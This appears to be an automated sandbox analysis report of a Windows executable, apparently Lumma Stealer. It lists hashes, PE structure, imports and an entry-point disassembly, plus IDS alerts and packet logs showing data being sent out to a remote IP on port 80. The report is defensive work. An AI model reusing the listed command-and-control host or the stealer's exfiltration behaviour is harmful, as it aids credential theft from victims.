                                                        Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN.nQ.5..............................................................................................................................................................................................................................................................................................................................................Z.ye........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.161752093231944
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:I2BJhmJou4.exe
                                                        File size:474'624 bytes
                                                        MD5:c847cb3090530ec9ae2e82805a03360d
                                                        SHA1:a7f075ba37961545ae0a819bda5d2be28618d60d
                                                        SHA256:16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962
                                                        SHA512:d8640e1ef34c4679215d515ef9594c39a9db51a672897489926a6a2b60cb2376beb0634808c11b72104a02c26c1cacd9dc9d98c78862b2411f3cc4bbe72ea32c
                                                        SSDEEP:12288:YALM9byCGBIH114+JbdWBOCGDInCDuz3gTR9:YAebZG2H11NJb4G0nBOR
                                                        TLSH:2CA49D4353A1BD59EB254B729E1EC6F8361DF9518F093B7A720C6E2F06B0872C1A7711
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y...............n.......n<......n=......`...............n9......n.......n......Rich............PE..L...+..a...................

                                                        File Icon

                                                        Icon Hash:4a183e435119984a

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x405c58
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x61B51A2B [Sat Dec 11 21:37:47 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:f1a2f8d8b54600da323a01db4f49195d

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FD5A1155F57h
                                                        jmp 00007FD5A11523AEh
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 20h
                                                        mov eax, dword ptr [ebp+08h]
                                                        push esi
                                                        push edi
                                                        push 00000008h
                                                        pop ecx
                                                        mov esi, 00401294h
                                                        lea edi, dword ptr [ebp-20h]
                                                        rep movsd
                                                        mov dword ptr [ebp-08h], eax
                                                        mov eax, dword ptr [ebp+0Ch]
                                                        pop edi
                                                        mov dword ptr [ebp-04h], eax
                                                        pop esi
                                                        test eax, eax
                                                        je 00007FD5A115252Eh
                                                        test byte ptr [eax], 00000008h
                                                        je 00007FD5A1152529h
                                                        mov dword ptr [ebp-0Ch], 01994000h
                                                        lea eax, dword ptr [ebp-0Ch]
                                                        push eax
                                                        push dword ptr [ebp-10h]
                                                        push dword ptr [ebp-1Ch]
                                                        push dword ptr [ebp-20h]
                                                        call dword ptr [004010FCh]
                                                        leave
                                                        retn 0008h
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        mov edx, dword ptr [ebp+08h]
                                                        push esi
                                                        push edi
                                                        test edx, edx
                                                        je 00007FD5A1152529h
                                                        mov edi, dword ptr [ebp+0Ch]
                                                        test edi, edi
                                                        jne 00007FD5A1152535h
                                                        call 00007FD5A115274Dh
                                                        push 00000016h
                                                        pop esi
                                                        mov dword ptr [eax], esi
                                                        call 00007FD5A1153560h
                                                        mov eax, esi
                                                        jmp 00007FD5A1152555h
                                                        mov eax, dword ptr [ebp+10h]
                                                        test eax, eax
                                                        jne 00007FD5A1152526h
                                                        mov byte ptr [edx], al
                                                        jmp 00007FD5A1152504h
                                                        mov esi, edx
                                                        sub esi, eax
                                                        mov cl, byte ptr [eax]
                                                        mov byte ptr [esi+eax], cl
                                                        inc eax
                                                        test cl, cl
                                                        je 00007FD5A1152525h
                                                        dec edi
                                                        jne 00007FD5A1152515h
                                                        test edi, edi
                                                        jne 00007FD5A1152533h
                                                        mov byte ptr [edx], 00000000h
                                                        call 00007FD5A1152717h
                                                        push 00000022h
                                                        pop ecx
                                                        mov dword ptr [eax], ecx
                                                        mov esi, ecx
                                                        jmp 00007FD5A11524E8h
                                                        xor eax, eax
                                                        pop edi
                                                        pop esi
                                                        pop ebp
                                                        ret
                                                        int3
                                                        int3
                                                        int3
                                                        mov ecx, dword ptr [esp+04h]
                                                        test ecx, 00000003h
                                                        je 00007FD5A1152546h
                                                        mov al, byte ptr [ecx]
                                                        add ecx, 00000000h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ASM] VS2010 build 30319
                                                        • [ C ] VS2010 build 30319
                                                        • [C++] VS2010 build 30319
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [RES] VS2010 build 30319
                                                        • [LNK] VS2010 build 30319

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1233c0x3c.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x28fe0000x1bc18.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39980x40.text
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x1c0.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x11da00x11e00b76206d2d320499f3ff13cf1c189d29eFalse0.5574874344405595data6.463633330803623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0x130000x28ead040x45e004822dc0d5f14f6436350a2de158cfe65unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x28fe0000x1bc180x1be0007946ee195931bcc383a16c4df6a010eFalse0.3036627662556054data3.8590886530682353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_CURSOR0x29170500x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
                                                        RT_CURSOR0x29171980x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4473684210526316
                                                        RT_CURSOR0x29172c80xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.4625
                                                        RT_CURSOR0x29173b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.08583489681050657
                                                        RT_CURSOR0x29184900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3407039711191336
                                                        RT_ICON0x28fea800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.3986175115207373
                                                        RT_ICON0x28fea800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.3986175115207373
                                                        RT_ICON0x28ff1480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.3908959537572254
                                                        RT_ICON0x28ff1480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.3908959537572254
                                                        RT_ICON0x28ff6b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.27790806754221387
                                                        RT_ICON0x28ff6b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.27790806754221387
                                                        RT_ICON0x29007580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3421985815602837
                                                        RT_ICON0x29007580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3421985815602837
                                                        RT_ICON0x2900c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.39981949458483756
                                                        RT_ICON0x2900c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.39981949458483756
                                                        RT_ICON0x29014a80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4498847926267281
                                                        RT_ICON0x29014a80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4498847926267281
                                                        RT_ICON0x2901b700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4226878612716763
                                                        RT_ICON0x2901b700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4226878612716763
                                                        RT_ICON0x29020d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2767354596622889
                                                        RT_ICON0x29020d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2767354596622889
                                                        RT_ICON0x29031800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.28114754098360656
                                                        RT_ICON0x29031800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.28114754098360656
                                                        RT_ICON0x2903b080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3191489361702128
                                                        RT_ICON0x2903b080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3191489361702128
                                                        RT_ICON0x2903fd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3715351812366738
                                                        RT_ICON0x2903fd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3715351812366738
                                                        RT_ICON0x2904e780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.48104693140794225
                                                        RT_ICON0x2904e780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.48104693140794225
                                                        RT_ICON0x29057200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5247695852534562
                                                        RT_ICON0x29057200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5247695852534562
                                                        RT_ICON0x2905de80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.5513005780346821
                                                        RT_ICON0x2905de80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.5513005780346821
                                                        RT_ICON0x29063500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.20342323651452282
                                                        RT_ICON0x29063500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.20342323651452282
                                                        RT_ICON0x29088f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.2347560975609756
                                                        RT_ICON0x29088f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.2347560975609756
                                                        RT_ICON0x29099a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.25163934426229506
                                                        RT_ICON0x29099a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.25163934426229506
                                                        RT_ICON0x290a3280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.3067375886524823
                                                        RT_ICON0x290a3280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.3067375886524823
                                                        RT_ICON0x290a8080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.28251599147121537
                                                        RT_ICON0x290a8080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.28251599147121537
                                                        RT_ICON0x290b6b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.3934331797235023
                                                        RT_ICON0x290b6b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.3934331797235023
                                                        RT_ICON0x290bd780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.39739884393063585
                                                        RT_ICON0x290bd780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.39739884393063585
                                                        RT_ICON0x290c2e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2233402489626556
                                                        RT_ICON0x290c2e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2233402489626556
                                                        RT_ICON0x290e8880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2795497185741088
                                                        RT_ICON0x290e8880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2795497185741088
                                                        RT_ICON0x290f9300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3016393442622951
                                                        RT_ICON0x290f9300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3016393442622951
                                                        RT_ICON0x29102b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3395390070921986
                                                        RT_ICON0x29102b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3395390070921986
                                                        RT_ICON0x29107880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.31369936034115137
                                                        RT_ICON0x29107880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.31369936034115137
                                                        RT_ICON0x29116300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.3813176895306859
                                                        RT_ICON0x29116300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.3813176895306859
                                                        RT_ICON0x2911ed80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.42223502304147464
                                                        RT_ICON0x2911ed80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.42223502304147464
                                                        RT_ICON0x29125a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.3872832369942196
                                                        RT_ICON0x29125a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.3872832369942196
                                                        RT_ICON0x2912b080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.23921161825726142
                                                        RT_ICON0x2912b080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.23921161825726142
                                                        RT_ICON0x29150b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.2774390243902439
                                                        RT_ICON0x29150b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.2774390243902439
                                                        RT_ICON0x29161580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.27991803278688526
                                                        RT_ICON0x29161580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.27991803278688526
                                                        RT_ICON0x2916ae00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.32269503546099293
                                                        RT_ICON0x2916ae00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.32269503546099293
                                                        RT_STRING0x2918f780x502dataTamilIndia0.4391575663026521
                                                        RT_STRING0x2918f780x502dataTamilSri Lanka0.4391575663026521
                                                        RT_STRING0x29194800x394dataTamilIndia0.4606986899563319
                                                        RT_STRING0x29194800x394dataTamilSri Lanka0.4606986899563319
                                                        RT_STRING0x29198180x396Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0TamilIndia0.46187363834422657
                                                        RT_STRING0x29198180x396Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0TamilSri Lanka0.46187363834422657
                                                        RT_STRING0x2919bb00x64dataTamilIndia0.65
                                                        RT_STRING0x2919bb00x64dataTamilSri Lanka0.65
                                                        RT_ACCELERATOR0x2916fc00x90dataTamilIndia0.6944444444444444
                                                        RT_ACCELERATOR0x2916fc00x90dataTamilSri Lanka0.6944444444444444
                                                        RT_GROUP_CURSOR0x29171800x14data1.15
                                                        RT_GROUP_CURSOR0x2918d380x14data1.25
                                                        RT_GROUP_CURSOR0x29184600x30data1.0
                                                        RT_GROUP_ICON0x290a7900x76dataTamilIndia0.6779661016949152
                                                        RT_GROUP_ICON0x290a7900x76dataTamilSri Lanka0.6779661016949152
                                                        RT_GROUP_ICON0x2900bc00x3edataTamilIndia0.8387096774193549
                                                        RT_GROUP_ICON0x2900bc00x3edataTamilSri Lanka0.8387096774193549
                                                        RT_GROUP_ICON0x2903f700x5adataTamilIndia0.7222222222222222
                                                        RT_GROUP_ICON0x2903f700x5adataTamilSri Lanka0.7222222222222222
                                                        RT_GROUP_ICON0x29107200x68dataTamilIndia0.7211538461538461
                                                        RT_GROUP_ICON0x29107200x68dataTamilSri Lanka0.7211538461538461
                                                        RT_GROUP_ICON0x2916f480x76dataTamilIndia0.6864406779661016
                                                        RT_GROUP_ICON0x2916f480x76dataTamilSri Lanka0.6864406779661016
                                                        RT_VERSION0x2918d500x228data0.5670289855072463

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllGetProfileIntW, BuildCommDCBAndTimeoutsA, InterlockedIncrement, InterlockedDecrement, SetMailslotInfo, GetSystemWindowsDirectoryW, FreeEnvironmentStringsA, GetProcessPriorityBoost, EnumCalendarInfoExW, WaitNamedPipeW, EnumTimeFormatsW, GetDriveTypeA, GetProcessTimes, GetVolumePathNameW, GetCalendarInfoA, GetConsoleAliasExesLengthW, GetFileAttributesA, WriteConsoleW, SetSystemPowerState, GetModuleFileNameW, CompareStringW, GetShortPathNameA, EnumSystemLocalesA, SearchPathW, DeleteFiber, GetLastError, GetProcAddress, AttachConsole, HeapSize, SetComputerNameA, EnterCriticalSection, OpenWaitableTimerA, LoadLibraryA, GetProcessId, LocalAlloc, SetCalendarInfoW, IsSystemResumeAutomatic, AddAtomA, OpenJobObjectW, GetPrivateProfileStructA, FindFirstVolumeMountPointA, EnumDateFormatsA, CreateIoCompletionPort, GetModuleHandleA, CancelTimerQueueTimer, FreeEnvironmentStringsW, FindNextFileW, SetFileShortNameA, AreFileApisANSI, HeapCompact, GetPrivateProfileIntW, GetVolumeNameForVolumeMountPointA, HeapFree, HeapAlloc, DeleteFileA, WideCharToMultiByte, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, IsProcessorFeaturePresent, HeapCreate, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, EncodePointer, LeaveCriticalSection, SetFilePointer, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, GetModuleFileNameA, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LoadLibraryW, Sleep, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CloseHandle, CreateFileW
                                                        GDI32.dllGetCharABCWidthsA, SelectObject

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        TamilIndia
                                                        TamilSri Lanka

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-13T10:53:30.089830+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971394.158.244.6980TCP
                                                        2024-11-13T10:53:30.089830+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84970894.158.244.6980TCP
                                                        2024-11-13T10:54:22.079039+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849706TCP
                                                        2024-11-13T10:54:34.362378+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84970794.158.244.6980TCP
                                                        2024-11-13T10:54:53.135143+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84970994.158.244.6980TCP
                                                        2024-11-13T10:54:59.967146+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849711TCP
                                                        2024-11-13T10:55:02.213728+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971094.158.244.6980TCP
                                                        2024-11-13T10:55:10.989197+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971294.158.244.6980TCP
                                                        2024-11-13T10:55:29.613117+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971494.158.244.6980TCP
                                                        2024-11-13T10:55:30.349548+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971594.158.244.6980TCP
                                                        2024-11-13T10:55:30.349548+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.84971594.158.244.6980TCP
                                                        2024-11-13T10:55:48.326883+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971694.158.244.6980TCP
                                                        2024-11-13T10:55:57.094150+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971794.158.244.6980TCP
                                                        2024-11-13T10:56:06.203781+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971894.158.244.6980TCP
                                                        2024-11-13T10:56:15.057549+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84971994.158.244.6980TCP
                                                        2024-11-13T10:56:23.838414+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84972094.158.244.6980TCP
                                                        2024-11-13T10:56:32.618908+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.84972194.158.244.6980TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 13, 2024 10:54:25.867844105 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.872735023 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.872829914 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.872971058 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.873425007 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.877752066 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.877830982 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.878293991 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878304958 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878357887 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:25.878405094 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878416061 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878423929 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878433943 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878443003 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878451109 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.878459930 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.882742882 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.883294106 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.883327007 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.883337021 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:25.883344889 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.362256050 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.362377882 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.362993956 CET4970780192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.367850065 CET804970794.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.817794085 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.823041916 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.823142052 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.823267937 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.824714899 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.828685045 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.828789949 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.829607010 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829623938 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829637051 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829663992 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829677105 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829689980 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829700947 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829701900 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.829737902 CET4970880192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:34.829849958 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.829863071 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.833641052 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.834511995 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.834527969 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.834563017 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.834589958 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.834603071 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:34.877552986 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:43.303020000 CET804970894.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:44.307792902 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:44.482095957 CET804970994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:44.482758999 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:44.482758999 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:44.484832048 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:44.487656116 CET804970994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:44.489751101 CET804970994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:53.135071993 CET804970994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:53.135143042 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.135479927 CET4970980192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.140507936 CET804970994.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:53.722238064 CET4971080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.727291107 CET804971094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:53.727447033 CET4971080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.728033066 CET4971080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.728033066 CET4971080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:54:53.732846975 CET804971094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:54:53.732882977 CET804971094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:02.213565111 CET804971094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:02.213727951 CET4971080192.168.2.894.158.244.69
